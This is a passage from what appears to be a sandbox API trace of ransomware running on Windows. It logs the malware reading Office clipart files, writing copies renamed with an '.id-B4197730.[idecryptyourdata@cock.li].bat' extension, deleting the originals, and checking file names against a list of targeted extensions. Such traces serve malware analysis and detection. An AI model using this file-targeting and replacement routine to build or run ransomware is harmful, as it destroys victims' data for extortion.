Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.154] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.154] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.155] GetLastError () returned 0x0 [0062.155] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa4c, lpOverlapped=0x0) returned 1 [0062.311] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa50, lpOverlapped=0x0) returned 1 [0062.312] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.312] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.312] SetEndOfFile (hFile=0x2c8) returned 1 [0062.312] CloseHandle (hObject=0x2c8) returned 1 [0062.313] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.313] SetEndOfFile (hFile=0x354) returned 1 [0062.314] CloseHandle (hObject=0x354) returned 1 [0062.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.315] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0062.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.317] lstrlenW (lpString=".doc") returned 4 [0062.317] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString=".docx") returned 5 [0062.318] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.318] lstrlenW (lpString=".pdf") returned 4 [0062.318] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString=".xls") returned 4 [0062.318] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.318] lstrlenW (lpString=".xlsx") returned 5 [0062.318] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.318] lstrlenW (lpString=".ppt") returned 4 [0062.318] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.318] lstrlenW (lpString=".zip") returned 4 [0062.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.318] lstrlenW (lpString=".rar") returned 4 [0062.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString=".bz2") returned 4 [0062.318] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString=".7z") returned 3 [0062.318] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.318] lstrlenW (lpString=".dbf") returned 4 [0062.318] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.318] lstrlenW (lpString=".1cd") returned 4 [0062.318] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.318] lstrlenW (lpString=".jpg") returned 4 [0062.318] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.319] lstrlenW (lpString=".doc") returned 4 [0062.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString=".docx") returned 5 [0062.319] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.319] lstrlenW (lpString=".pdf") returned 4 [0062.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString=".xls") returned 4 [0062.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.319] lstrlenW (lpString=".xlsx") returned 5 [0062.319] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.319] lstrlenW (lpString=".ppt") returned 4 [0062.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.319] lstrlenW (lpString=".zip") returned 4 [0062.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.319] lstrlenW (lpString=".rar") returned 4 [0062.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString=".bz2") returned 4 [0062.319] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString=".7z") returned 3 [0062.319] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.319] lstrlenW (lpString=".dbf") returned 4 [0062.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.319] lstrlenW (lpString=".1cd") returned 4 [0062.319] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 68 [0062.320] lstrlenW (lpString=".jpg") returned 4 [0062.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.320] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.320] lstrlenW (lpString="AN04206_.WMF") returned 12 [0062.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.320] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=7668) returned 1 [0062.320] CloseHandle (hObject=0x354) returned 1 [0062.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf")) returned 0x220 [0062.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.321] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.321] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.325] GetLastError () returned 0x0 [0062.325] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1df4, lpOverlapped=0x0) returned 1 [0062.382] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1e00, lpOverlapped=0x0) returned 1 [0062.383] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.383] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.383] SetEndOfFile (hFile=0x344) returned 1 [0062.383] CloseHandle (hObject=0x344) returned 1 [0062.384] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.384] SetEndOfFile (hFile=0x2c8) returned 1 [0062.385] CloseHandle (hObject=0x2c8) returned 1 [0062.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.385] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0062.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.387] lstrlenW (lpString=".doc") returned 4 [0062.387] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.387] lstrlenW (lpString=".docx") returned 5 [0062.387] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.387] lstrlenW (lpString=".pdf") returned 4 [0062.387] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.387] lstrlenW (lpString=".xls") returned 4 [0062.387] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.388] lstrlenW (lpString=".xlsx") returned 5 [0062.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.388] lstrlenW (lpString=".ppt") returned 4 [0062.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString=".zip") returned 4 [0062.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.388] lstrlenW (lpString=".rar") returned 4 [0062.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString=".bz2") returned 4 [0062.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString=".7z") returned 3 [0062.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString=".dbf") returned 4 [0062.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString=".1cd") returned 4 [0062.388] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString=".jpg") returned 4 [0062.388] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.388] lstrlenW (lpString=".doc") returned 4 [0062.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.388] lstrlenW (lpString=".docx") returned 5 [0062.389] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.389] lstrlenW (lpString=".pdf") returned 4 [0062.389] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString=".xls") returned 4 [0062.389] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.389] lstrlenW (lpString=".xlsx") returned 5 [0062.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.389] lstrlenW (lpString=".ppt") returned 4 [0062.389] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.389] lstrlenW (lpString=".zip") returned 4 [0062.389] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.389] lstrlenW (lpString=".rar") returned 4 [0062.389] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString=".bz2") returned 4 [0062.389] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString=".7z") returned 3 [0062.389] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.389] lstrlenW (lpString=".dbf") returned 4 [0062.389] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.389] lstrlenW (lpString=".1cd") returned 4 [0062.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 68 [0062.389] lstrlenW (lpString=".jpg") returned 4 [0062.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.389] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.389] lstrlenW (lpString="AN04267_.WMF") returned 12 [0062.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.394] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=7804) returned 1 [0062.394] CloseHandle (hObject=0x344) returned 1 [0062.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf")) returned 0x220 [0062.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.394] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.394] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.395] GetLastError () returned 0x0 [0062.395] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1e7c, lpOverlapped=0x0) returned 1 [0062.482] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1e80, lpOverlapped=0x0) returned 1 [0062.483] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.483] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.483] SetEndOfFile (hFile=0x354) returned 1 [0062.483] CloseHandle (hObject=0x354) returned 1 [0062.484] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.484] SetEndOfFile (hFile=0x344) returned 1 [0062.484] CloseHandle (hObject=0x344) returned 1 [0062.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0062.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.485] lstrlenW (lpString=".doc") returned 4 [0062.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.485] lstrlenW (lpString=".docx") returned 5 [0062.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.485] lstrlenW (lpString=".pdf") returned 4 [0062.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.485] lstrlenW (lpString=".xls") returned 4 [0062.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.485] lstrlenW (lpString=".xlsx") returned 5 [0062.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.485] lstrlenW (lpString=".ppt") returned 4 [0062.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.485] lstrlenW (lpString=".zip") returned 4 [0062.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.485] lstrlenW (lpString=".rar") returned 4 [0062.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".bz2") returned 4 [0062.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".7z") returned 3 [0062.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString=".dbf") returned 4 [0062.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString=".1cd") returned 4 [0062.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString=".jpg") returned 4 [0062.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString=".doc") returned 4 [0062.486] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".docx") returned 5 [0062.486] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.486] lstrlenW (lpString=".pdf") returned 4 [0062.486] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".xls") returned 4 [0062.486] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.486] lstrlenW (lpString=".xlsx") returned 5 [0062.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.486] lstrlenW (lpString=".ppt") returned 4 [0062.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.486] lstrlenW (lpString=".zip") returned 4 [0062.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.486] lstrlenW (lpString=".rar") returned 4 [0062.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".bz2") returned 4 [0062.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.486] lstrlenW (lpString=".7z") returned 3 [0062.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.487] lstrlenW (lpString=".dbf") returned 4 [0062.487] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.487] lstrlenW (lpString=".1cd") returned 4 [0062.487] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 68 [0062.487] lstrlenW (lpString=".jpg") returned 4 [0062.487] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.487] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.487] lstrlenW (lpString="AN04323_.WMF") returned 12 [0062.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.487] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=2492) returned 1 [0062.487] CloseHandle (hObject=0x344) returned 1 [0062.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf")) returned 0x220 [0062.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 